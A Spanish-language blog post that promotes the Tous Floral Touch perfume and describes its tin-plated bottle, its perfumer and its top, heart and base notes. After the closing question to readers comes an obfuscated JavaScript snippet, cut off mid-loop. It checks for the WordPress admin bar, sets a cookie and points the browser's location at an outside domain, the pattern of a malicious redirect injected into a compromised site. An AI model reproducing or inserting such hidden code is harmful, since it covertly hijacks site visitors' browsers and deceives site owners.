perfume tous floral touch

Ocho años después de la creación del icónico perfume Tous Touch la firma de joyería se lanza a realizar un homenaje a la artesanía en los tiempos actuales.

Tous selecciona uno de los materiales más nobles y maleables en la orfebrería: el estaño.

Los acordes florales existentes en el corazón de la fragancia emergen y se alean quedando eternamente atrapados en el estaño.

El contraste de la fragilidad de las flores y la atemporalidad del metal  conviven en una pieza de colección, la infinita primavera convertida en joya.

Respecto a su envase nos encontramos un frasco al cual sus volúmenes deliberadamente irregulares le aportan sensualidad, como esas joyas hechas a mano antiguas.

Decorando el frasco nos encontramos una delicada placa de estaño que deja suspendida delicadamente su lecho floral entre la que podemos entrever la silueta del oso TOUS.

perfume tous floral touch

En cuanto a su aroma que nos recuerda a una primavera atemporal se ve representada en una estela fucsia desde la parte interior del frasco y se apodera al completo de su estuche, dotando de color y vida las flores que nacen delicadamente en su interior.

El perfume Tous Floral Touch nace de la mano de Sophie  Labbé prestigiosa perfumista que reinterpreta la versión original del perfume Tous Touch y la transporta a una primavera que no entiende de estaciones, gracias a sus exquisitas flores entran en un incontrolable frenesí olfativo convirtiéndose en una primavera constante en cualquier época del año.

Tous Floral Touch es una fragancia de mujer de la familia olfativa floral-afrutada en la que encontraremos en sus notas los siguientes matices:

Como notas de salida: bergamota, limón italiano y hojas de violeta.

Como notas de corazón: Flor de fresa silvestre, tuberosa y extracto de gengibre.

Como notas de fondo: Ámbargris, Almizcles Sensuales y Cedro.

El resultado obtenido es una composición que estalla  en un júbilo de notas florales refrescado por un chispeante acorde cítrico de salida que da paso al majestuoso corazón floral.

Un bouquet a base de flores de fresas silvestres que se combinan con la tuberosa y el jazmín formando una sedosa estela cuyo néctar se funde con la sensualidad de almizcles en el fondo de la fragancia.

Estamos seguros que el perfume de mujer Tous Floral Touch se convertirá en el regalo perfecto para estas navidades, ya que tiene todos los ingredientes para ser un éxito de ventas igual que fue su predecesor.

Cuéntanos, ¿Has tenido oportunidad de oler el perfume Tous Floral Touch? ¿Qué os parece? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone